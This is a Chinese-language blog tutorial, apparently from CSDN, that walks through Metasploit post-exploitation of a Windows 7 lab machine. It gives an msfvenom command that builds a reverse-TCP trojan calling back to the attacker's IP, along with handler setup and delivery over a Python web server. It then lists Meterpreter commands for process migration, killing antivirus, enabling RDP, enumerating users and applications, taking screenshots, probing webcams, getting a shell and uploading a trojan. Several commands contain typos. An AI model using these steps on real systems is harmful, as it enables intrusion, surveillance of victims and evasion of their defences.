Metapsloit后渗透Windows攻击(亲测metepreter使用教程)

Meterpreter是什么?

在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。

如何进入meterpreter?

实验环境:

  • kali metasploit 192.168.31.135
  • windows7 192.168.31.160

实验步骤:
在这里插入图片描述

msfvenom -p windows/x64/metepreter/reverse_tcp lhost=192.168.31.135 lport=1234 -f  exe > /hacker.exe
#生成木马
#lhost 本地地址
#lport 取0-65535中占用地址即可
#-f exe 指定木马文件类型hacker.exe

在这里插入图片描述

use exploit/multi/hander #选择漏洞利用模块

在这里插入图片描述

set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set lhost #设置反向代理ip
set lport #设置端口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用kali自带python搭建8000端口的服务器,Windows7访问服务器获取木马文件自动运行

在这里插入图片描述

获取meterpreter shell!

在刚获得Meterpreter shell时,该shell是极其脆弱和易受攻击的
在这里插入图片描述
在这里插入图片描述

#输入getpid获取Meterpreter shell的进程号
#输入命令获取目标及正在运行的进程

在这里插入图片描述

#输入migrate 1932 命令把shell移动到PID为1932的Explorer.exe的进程里,因为该进程是个稳定的进程。

在这里插入图片描述
在这里插入图片描述

#先输入sysinfo命令查看目标及的系统信息例如操作系统和体系架构
#输入run /post/windows/gather/checkvm命令查看目标是否运行在虚拟机上

在这里插入图片描述

#接着输入route命令可以查看目标完整的网络设置

在这里插入图片描述

#使用run post/windows/manage/killav可以关闭目标系统的杀毒软件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#输入 run post/windows/manage/enable_rdp启动目标的远程桌面协议,也就是常说的3389端口
#接着 run post/windows/gather/enum_logged_on_users列举当前有多少用户登录了目标
#继续 run post/windows/gather/enum_applications列举安装在目标上的应用程序

在抓取屏幕截图前需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令就可以抓取此使目标的屏幕截图
在这里插入图片描述
抓取成功后生成一个名为DYysaHbh的图片保存在root目录下,这里输入screenshot命令也可以达到同样的效果
在这里插入图片描述
查看目标有没有摄像头的命令为webcam_list
在这里插入图片描述
在这里插入图片描述

由于我目标Windows7无图像设备所以摄像头图像无法抓取

在这里插入图片描述
在这里插入图片描述

#可以输入shell命令进入目标的shell下,同时也支持各种文件系统命令

在这里插入图片描述

#upload /root/hack.exe c:\ 上传攻击机root目录下的木马文件到目标的c盘下
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李昕泽不是程序员

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值